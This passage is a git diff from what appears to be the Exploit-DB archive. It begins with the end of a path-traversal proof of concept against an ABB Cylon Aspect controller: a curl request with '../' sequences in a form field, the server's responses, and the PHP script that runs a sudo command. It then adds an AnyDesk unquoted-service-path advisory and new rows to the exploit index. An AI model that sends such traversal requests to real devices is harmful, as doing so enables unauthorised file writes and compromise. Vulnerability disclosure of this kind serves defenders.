+> -d "listFile=%2Fusr%2Flocal%2Faam%2Fetc%2Feth0\
+> &devName=../../../../../../../home/MIX_CMIX/htmlroot/testingus\
+> &useDHCP=1\
+> &dhcp=YES\
+> &IP1=192&IP2=168&IP3=73&IP4=31\
+> &SM1=255&SM2=255&SM3=255&SM4=0\
+> &N1=192&N2=168&N3=1&N4=0\
+> &B1=192&B2=168&B3=1&B4=255\
+> &GW1=192&GW2=168&GW3=1&GW4=254\
+> &DNSA1=&DNSA2=&DNSA3=&DNSA4=\
+> &DNSB1=&DNSB2=&DNSB3=&DNSB4=\
+> &submitTime=Submit" \
+> -H "Cookie: PHPSESSID=xxx"
+
+<html>
+<head>
+    <title>Web Server Configuration</title>
+    <link rel="stylesheet" type="text/css" href="matrixstyle.css"/>
+</head>
+<body class="workscroll" topmargin="0" leftmargin="0" scroll="No">
+<h1>Ethernet Settings</h1>
+<p class="subtitle">
+    Ethernet settings have been successfully updated.<br>Please supply MAC address below to your Network Administrator in order to determine new IP Address.<br><b>MAC Address:  </b></p>
+<iframe src="ethernetUpdateRun.php" style="visibility:hidden;"/>
+
+    </form>
+
+    <hr>
+</body>
+</html>
+
+$ curl http://192.168.73.31/testingus.bak
+ONBOOT=yes
+DHCP=YES
+IPADDR=192.168.73.31
+NETMASK=255.255.255.0
+GATEWAY=192.168.1.254
+NETWORK=192.168.1.0
+BROADCAST=192.168.1.255
+DNS1=
+DNS2=
+
+$ cat -n /home/MIX_CMIX/htmlroot/ethernetUpdateRun.php
+     1    <?php
+     2    //---------Begin Authorization-------------
+     3    require_once 'validate/validateHeader.php';
+     4    //--------End Authorization----------------
+     5    include "lib/configParameter.php";
+     6    $lookupLog = "config/configfile";
+     7    $listFile = trim(obtainValue($lookupLog, "SHELL"));
+     8    $command = $listFile . "net.sh";
+     9    $sudo = trim(obtainValue($lookupLog, "SUDO"));
+    10    logWarning("Ethernet Settings modified");
+    11    exec($sudo . " " . $listFile . "net.sh");
+    12    exit();
+    13
+    14    ?>
\ No newline at end of file
diff --git a/exploits/windows/local/52258.txt b/exploits/windows/local/52258.txt
new file mode 100644
index 000000000..9a4cf0d55
--- /dev/null
+++ b/exploits/windows/local/52258.txt
@@ -0,0 +1,32 @@
+# Exploit Title: AnyDesk 9.0.1 - Unquoted Service Path
+# Date: 2024-12-11
+# Exploit Author: Parastou Razi
+# Contact: razi.parastoo@gmail.com
+# Vendor Homepage: http://anydesk.com
+# Software Link: http://anydesk.com/download
+# Version: Software Version 9.0.1
+# Tested on: Windows 11 x64
+
+1. Description:
+
+The Anydesk installs as a service with an unquoted service path running
+with SYSTEM privileges.
+This could potentially allow an authorized but non-privileged local
+user to execute arbitrary code with elevated privileges on the system.
+
+2. Proof
+
+C:\>sc qc anydesk --service
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: anydesk
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe"
+--service
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : AnyDesk Service
+        DEPENDENCIES       : RpcSs
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a130cb584..241436a07 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11592,6 +11592,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 30508,exploits/multiple/remote/30508.txt,"Toribash 2.x - Multiple Vulnerabilities",2007-08-18,"Luigi Auriemma",remote,multiple,,2007-08-18,2013-12-27,1,CVE-2007-4446;OSVDB-39701,,,,,https://www.securityfocus.com/bid/25359/info
 36238,exploits/multiple/remote/36238.txt,"Toshiba e-Studio (Multiple Devices) - Security Bypass",2011-10-17,"Deral Heiland PercX",remote,multiple,,2011-10-17,2015-03-03,1,CVE-2012-1239;OSVDB-81507,,,,,https://www.securityfocus.com/bid/50168/info
 47531,exploits/multiple/remote/47531.rb,"Total.js CMS 12 - Widget JavaScript Code Injection (Metasploit)",2019-10-22,Metasploit,remote,multiple,,2019-10-22,2019-10-22,1,CVE-2019-15954,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/totaljs_cms_widget_exec.rb
+52249,exploits/multiple/remote/52249.c,"TP-Link VN020 F3v(T) TT_V6.2.1021 - Buffer Overflow Memory Corruption",2025-04-17,"Mohamed Maatallah",remote,multiple,,2025-04-17,2025-04-17,0,CVE-2024-12344,,,,,
+52250,exploits/multiple/remote/52250.txt,"TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)",2025-04-17,"Mohamed Maatallah",remote,multiple,,2025-04-17,2025-04-17,0,CVE-2024-12342,,,,,
 43665,exploits/multiple/remote/43665.md,"Transmission - RPC DNS Rebinding",2018-01-11,"Google Security Research",remote,multiple,9091,2018-01-17,2018-01-17,1,CVE-2018-5702,,,,,https://github.com/taviso/rbndr/tree/a189ffd9447ba78aa2702c5649d853b6fb612e3b
 47155,exploits/multiple/remote/47155.txt,"Trend Micro Deep Discovery Inspector IDS - Security Bypass",2019-07-24,hyp3rlinx,remote,multiple,,2019-07-24,2019-07-24,0,,,,,,
 21339,exploits/multiple/remote/21339.c,"Trend Micro Interscan VirusWall 3.5/3.6 - Content-Length Scan Bypass",2002-03-11,"Jochen Thomas Bauer",remote,multiple,,2002-03-11,2012-09-17,1,CVE-2002-0440;OSVDB-6162,,,,,https://www.securityfocus.com/bid/4265/info
@@ -11715,6 +11717,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49403,exploits/multiple/webapps/49403.txt,"Anchor CMS 0.12.7 - 'markdown' Stored Cross-Site Scripting",2021-01-11,"Ramazan Mert GÖKTEN",webapps,multiple,,2021-01-11,2021-01-11,0,,,,,,
 49451,exploits/multiple/webapps/49451.html,"Anchor CMS 0.12.7 - CSRF (Delete user)",2021-01-21,"Ninad Mishra",webapps,multiple,,2021-01-21,2021-01-21,0,CVE-2020-23342,,,,,
 47459,exploits/multiple/webapps/47459.py,"AnchorCMS < 0.12.3a - Information Disclosure",2019-10-03,"Tijme Gommers",webapps,multiple,,2019-10-03,2019-10-03,0,CVE-2018-7251,,,,,
+52253,exploits/multiple/webapps/52253.py,"Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE)",2025-04-17,"Ravindu Wickramasinghe",webapps,multiple,,2025-04-17,2025-04-17,0,CVE-2024-42640,,,,,
 49836,exploits/multiple/webapps/49836.js,"Anote 1.0 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
 35786,exploits/multiple/webapps/35786.txt,"Ansible Tower 2.0.2 - Multiple Vulnerabilities",2015-01-14,"SEC Consult",webapps,multiple,80,2015-01-14,2015-01-14,0,OSVDB-116965;OSVDB-116964;OSVDB-116963;OSVDB-116962;OSVDB-116961;OSVDB-116960;OSVDB-116959;CVE-2015-1482;CVE-2015-1481;CVE-2015-1368,,,,,
 44220,exploits/multiple/webapps/44220.txt,"antMan < 0.9.1a - Authentication Bypass",2018-03-02,"Joshua Bowser",webapps,multiple,,2018-03-02,2018-03-09,0,CVE-2018-7739,,,,,
@@ -11799,6 +11802,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48708,exploits/multiple/webapps/48708.txt,"Bio Star 2.8.2 - Local File Inclusion",2020-07-26,"SITE Team",webapps,multiple,,2020-07-26,2020-07-26,0,CVE-2020-15050,,,,,
 33995,exploits/multiple/webapps/33995.txt,"Blaze Apps 1.x - SQL Injection / HTML Injection",2010-01-19,"AmnPardaz Security Research Team",webapps,multiple,,2010-01-19,2014-07-07,1,,,,,,https://www.securityfocus.com/bid/40212/info
 49759,exploits/multiple/webapps/49759.txt,"Blitar Tourism 1.0 - Authentication Bypass SQLi",2021-04-13,sigeri94,webapps,multiple,,2021-04-13,2021-04-13,0,,,,,,
+52256,exploits/multiple/webapps/52256.txt,"Blood Bank & Donor Management System 2.4 - CSRF Improper Input Validation",2025-04-17,"Kwangyun Keum",webapps,multiple,,2025-04-17,2025-04-17,0,CVE-2024-12955,,,,,
 48701,exploits/multiple/webapps/48701.txt,"Bludit 3.9.2 - Directory Traversal",2020-07-26,"James Green",webapps,multiple,,2020-07-26,2020-07-26,0,CVE-2019-16113,,,,,
 51013,exploits/multiple/webapps/51013.txt,"Bookwyrm v0.4.3 - Authentication Bypass",2022-09-20,"Akshay Ravi",webapps,multiple,,2022-09-20,2023-08-02,1,CVE-2022-2651,,,,,
 9872,exploits/multiple/webapps/9872.txt,"boxalino 09.05.25-0421 - Directory Traversal",2009-10-20,"Axel Neumann",webapps,multiple,,2009-10-19,,1,CVE-2009-1479;OSVDB-59145,,,,,
@@ -11852,6 +11856,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43177,exploits/multiple/webapps/43177.txt,"CommuniGatePro 6.1.16 - Cross-Site Scripting",2017-11-15,"Boumediene KADDOUR",webapps,multiple,,2017-11-24,2017-11-27,0,CVE-2017-16962,,,,,
 46408,exploits/multiple/webapps/46408.txt,"Comodo Dome Firewall 2.7.0 - Cross-Site Scripting",2019-02-18,"Ozer Goker",webapps,multiple,,2019-02-18,2019-02-18,0,,"Cross-Site Scripting (XSS)",,,,
 48825,exploits/multiple/webapps/48825.py,"Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution",2020-09-22,"Milad Fadavvi",webapps,multiple,,2020-09-22,2020-09-22,0,CVE-2018-17431,,,,,
+52257,exploits/multiple/webapps/52257.txt,"compop.ca 3.5.3 - Arbitrary code Execution",2025-04-17,dmlino,webapps,multiple,,2025-04-17,2025-04-17,0,CVE-2024-48445,,,,,
 43377,exploits/multiple/webapps/43377.txt,"Conarc iChannel - Improper Access Restrictions",2017-12-20,"Information Paradox",webapps,multiple,,2017-12-20,2017-12-21,0,CVE-2017-17759,,,,,
 9916,exploits/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 - Command Execution (Metasploit)",2009-02-25,patrick,webapps,multiple,,2009-02-24,,1,OSVDB-54551,"Metasploit Framework (MSF)",,,,
 46820,exploits/multiple/webapps/46820.txt,"Cortex Unshortenlink Analyzer < 1.1 - Server-Side Request Forgery",2019-05-10,"Alexandre Basquin",webapps,multiple,,2019-05-10,2019-05-13,1,CVE-2019-7652,"Server-Side Request Forgery (SSRF)",,,,
@@ -12424,6 +12429,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple,80,2019-08-01,2019-08-02,0,,"Cross-Site Scripting (XSS)",,,,
 52139,exploits/multiple/webapps/52139.txt,"UNA CMS 14.0.0-RC - PHP Object Injection",2025-04-08,"Egidio Romano",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
 49150,exploits/multiple/webapps/49150.txt,"Under Construction Page with CPanel 1.0 - SQL injection",2020-12-02,"Mayur Parmar",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
+52254,exploits/multiple/webapps/52254.py,"Usermin 2.100 - Username Enumeration",2025-04-17,Kjesper,webapps,multiple,,2025-04-17,2025-04-17,0,CVE-2024-44762,,,,,
 47058,exploits/multiple/webapps/47058.txt,"Varient 1.6.1 - SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,multiple,80,2019-07-01,2019-07-03,0,,"SQL Injection (SQLi)",,,,
 43362,exploits/multiple/webapps/43362.md,"vBulletin 5.x - 'cacheTemplates' Remote Arbitrary File Deletion",2017-12-13,SecuriTeam,webapps,multiple,,2017-12-18,2019-10-01,0,CVE-2017-17672,,,,,https://blogs.securiteam.com/index.php/archives/3573
 43361,exploits/multiple/webapps/43361.md,"vBulletin 5.x - 'routestring' Remote Code Execution",2017-12-13,SecuriTeam,webapps,multiple,,2017-12-18,2019-10-01,0,,,,,,https://blogs.securiteam.com/index.php/archives/3569
@@ -13053,7 +13059,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49807,exploits/php/dos/49807.py,"WordPress Plugin WPGraphQL 1.3.5 - Denial of Service",2021-04-27,"Dolev Farhi",dos,php,,2021-04-27,2021-10-29,0,,,,,,
 1345,exploits/php/dos/1345.php,"Xaraya 1.0.0 RC4 - 'create()' Denial of Service",2005-11-29,rgod,dos,php,,2005-11-28,2016-06-13,1,OSVDB-21249;CVE-2005-3929,,,,http://www.exploit-db.comxaraya-1.0-core.zip,
 44336,exploits/php/dos/44336.py,"XenForo 2 - CSS Loader Denial of Service",2018-03-23,LockedByte,dos,php,,2018-03-23,2018-03-23,0,,"Denial of Service (DoS)",,,,
+52251,exploits/php/hardware/52251.txt,"ABB Cylon Aspect 3.08.02 (deployStart.php) - Unauthenticated Command Execution",2025-04-17,LiquidWorm,hardware,php,,2025-04-17,2025-04-17,0,CVE-2024-48840,,,,,
 52218,exploits/php/hardware/52218.txt,"ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS)",2025-04-15,LiquidWorm,hardware,php,,2025-04-15,2025-04-15,0,CVE-2024-48844,,,,,
+52252,exploits/php/hardware/52252.txt,"ABB Cylon Aspect 3.08.02 (ethernetUpdate.php)  - Authenticated Path Traversal",2025-04-17,LiquidWorm,hardware,php,,2025-04-17,2025-04-17,0,,,,,,
 52219,exploits/php/hardware/52219.txt,"ABB Cylon Aspect 3.08.02 (webServerUpdate.php) - Input Validation Config Poisoning",2025-04-15,LiquidWorm,hardware,php,,2025-04-15,2025-04-15,0,,,,,,
 52234,exploits/php/hardware/52234.txt,"ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php)  - File Write DoS",2025-04-16,LiquidWorm,hardware,php,,2025-04-16,2025-04-16,0,,,,,,
 52233,exploits/php/hardware/52233.txt,"ABB Cylon Aspect 4.00.00 (factorySaved.php) - Unauthenticated XSS",2025-04-16,LiquidWorm,hardware,php,,2025-04-16,2025-04-16,0,,,,,,
@@ -39896,6 +39904,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40410,exploits/windows/local/40410.txt,"AnyDesk 2.5.0 - Unquoted Service Path Privilege Escalation",2016-09-22,Tulpa,local,windows,,2016-09-22,2016-09-22,0,,,,,http://www.exploit-db.comAnyDesk.exe,
 47883,exploits/windows/local/47883.txt,"AnyDesk 5.4.0 - Unquoted Service Path",2020-01-07,SajjadBnd,local,windows,,2020-01-07,2020-01-07,0,,,,,,
 51968,exploits/windows/local/51968.txt,"AnyDesk 7.0.15 - Unquoted Service Path",2024-04-08,"Milad karimi",local,windows,,2024-04-08,2024-04-08,0,,,,,,
+52258,exploits/windows/local/52258.txt,"AnyDesk 9.0.1 - Unquoted Service Path",2025-04-17,"Parastou Razi",local,windows,,2025-04-17,2025-04-17,0,,,,,,
 49549,exploits/windows/local/49549.txt,"AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path",2021-02-09,"Mohammed Alshehri",local,windows,,2021-02-09,2021-02-09,0,,,,,,
 16132,exploits/windows/local/16132.html,"AoA DVD Creator 2.5 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",local,windows,,2011-02-07,2011-02-07,1,OSVDB-107970,,,http://www.exploit-db.com/screenshots/idlt16500/16132.png,,
 16133,exploits/windows/local/16133.html,"AoA Mp4 Converter 4.1.0 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",local,windows,,2011-02-07,2011-02-07,1,,,,http://www.exploit-db.com/screenshots/idlt16500/16133.png,,